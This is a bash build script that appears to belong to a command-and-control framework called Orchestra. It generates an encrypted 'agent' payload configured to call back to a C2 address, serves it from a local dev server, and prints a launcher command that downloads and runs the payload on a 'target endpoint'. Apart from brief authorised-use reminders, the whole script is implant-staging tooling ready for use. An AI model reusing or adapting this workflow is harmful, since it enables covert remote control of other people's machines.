#!/usr/bin/env bash
# quickbuild.sh — One-click Orchestra payload generator.
#
# Walks a fresh host through:
#   1. Installing Rust via rustup (with consent) if missing.
#   2. Running `orchestra-builder setup` to verify build dependencies.
#   3. Creating a default profile targeting the current OS if none exists.
#   4. Building the payload.
#   5. Starting the dev-server to serve the payload.
#
# Repository: https://github.com/t-h-i-n-k-er/orchestra.git
#   6. Printing the exact launcher command to run on a target endpoint.
#
# This script is intended for use on systems you own or manage.

set -euo pipefail

ROOT="$(cd "$(dirname "$0")/.." && pwd)"
cd "$ROOT"

PROFILE_NAME="${ORCHESTRA_QUICKBUILD_PROFILE:-quickbuild}"
PROFILE_PATH="profiles/${PROFILE_NAME}.toml"
DEV_SERVER_PORT="${ORCHESTRA_QUICKBUILD_PORT:-8000}"

log()  { printf '\033[1;34m[quickbuild]\033[0m %s\n' "$*"; }
warn() { printf '\033[1;33m[quickbuild]\033[0m %s\n' "$*" >&2; }
die()  { printf '\033[1;31m[quickbuild]\033[0m %s\n' "$*" >&2; exit 1; }

confirm() {
    # Read y/N from /dev/tty so we still work when stdin is piped.
    local prompt="$1"
    local reply
    if [[ ! -t 0 && ! -e /dev/tty ]]; then
        warn "no TTY available; assuming 'no' for: $prompt"
        return 1
    fi
    read -r -p "$prompt [y/N] " reply </dev/tty
    [[ "$reply" =~ ^[Yy]$ ]]
}

# --- 1. Rust toolchain ------------------------------------------------------

if ! command -v cargo >/dev/null 2>&1; then
    warn "Rust toolchain (cargo) was not found on PATH."
    if confirm "Install Rust now via rustup?"; then
        log "Downloading rustup-init..."
        curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y --default-toolchain stable
        # shellcheck disable=SC1090
        source "$HOME/.cargo/env"
    else
        die "Rust is required. Install it from https://rustup.rs and re-run."
    fi
fi

log "cargo: $(cargo --version)"

# --- 2. Builder bring-up ----------------------------------------------------

BUILDER_BIN="$ROOT/target/release/orchestra-builder"
if [[ ! -x "$BUILDER_BIN" ]]; then
    log "Building orchestra-builder (release)..."
    cargo build --release -p builder
fi

log "Running 'orchestra-builder setup --auto-install'..."
"$BUILDER_BIN" setup --auto-install || warn "setup reported issues; review the output above before continuing."

# --- 3. Profile -------------------------------------------------------------

mkdir -p profiles dist

detect_os() {
    case "$(uname -s)" in
        Linux*)  echo "linux"  ;;
        Darwin*) echo "macos"  ;;
        MINGW*|MSYS*|CYGWIN*) echo "windows" ;;
        *)       echo "linux"  ;;
    esac
}

detect_arch() {
    case "$(uname -m)" in
        x86_64|amd64) echo "x86_64"  ;;
        aarch64|arm64) echo "aarch64" ;;
        *)             echo "x86_64" ;;
    esac
}

if [[ ! -f "$PROFILE_PATH" ]]; then
    log "No profile '$PROFILE_NAME' found — creating a default one."
    OS=$(detect_os)
    ARCH=$(detect_arch)
    # 32 random bytes -> base64 (44 chars) AES-256 key.
    KEY=$(head -c 32 /dev/urandom | base64 | tr -d '\n')
    C_SECRET=$(head -c 32 /dev/urandom | base64 | tr -d '\n')
    cat > "$PROFILE_PATH" <<TOML
# Auto-generated by scripts/quickbuild.sh
target_os      = "${OS}"
target_arch    = "${ARCH}"
c2_address     = "127.0.0.1:7890"
encryption_key = "${KEY}"
c_server_secret = "${C_SECRET}"
features       = ["outbound-c"]
package        = "agent"
bin_name       = "agent-standalone"
TOML
    log "Wrote ${PROFILE_PATH}"
else
    log "Re-using existing profile ${PROFILE_PATH}"
fi

# Pull the encryption key back out so we can print the launcher command later.
PROFILE_KEY=$(awk -F'"' '/^encryption_key/ { print $2; exit }' "$PROFILE_PATH")
PROFILE_C2=$(awk -F'"' '/^c2_address/    { print $2; exit }' "$PROFILE_PATH")

# --- 4. Build payload -------------------------------------------------------

log "Building payload for profile '$PROFILE_NAME'..."
"$BUILDER_BIN" build "$PROFILE_NAME"

PAYLOAD="dist/${PROFILE_NAME}.enc"
[[ -f "$PAYLOAD" ]] || die "expected $PAYLOAD to exist after build"
log "Payload ready: $(ls -lh "$PAYLOAD" | awk '{print $5, $9}')"

# --- 5. Dev server ----------------------------------------------------------

log "Starting dev-server on 127.0.0.1:${DEV_SERVER_PORT} (Ctrl-C to stop)..."

LAUNCHER_BIN="$ROOT/target/release/launcher"
if [[ ! -x "$LAUNCHER_BIN" ]]; then
    log "Building launcher binary so you can copy it to a target..."
    cargo build --release -p launcher
fi

cat <<EOF

================================================================================
  Quickbuild complete.

  Payload:        ${PAYLOAD}
  Encryption key: ${PROFILE_KEY}
  Agent C2:       ${PROFILE_C2}
  Dev server:     http://127.0.0.1:${DEV_SERVER_PORT}/${PROFILE_NAME}.enc

    The encrypted payload contains an outbound agent. Start an Orchestra Control
    Center listener that matches Agent C2 before launching it.

  Copy ${LAUNCHER_BIN}
  to your TEST endpoint and run:

      ./launcher \\
          --url http://<this-host>:${DEV_SERVER_PORT}/${PROFILE_NAME}.enc \\
          --key '${PROFILE_KEY}'

  Reminder: only deploy to systems you own or are authorised to manage.
================================================================================

EOF

exec cargo run --release -p dev-server -- --port "${DEV_SERVER_PORT}"
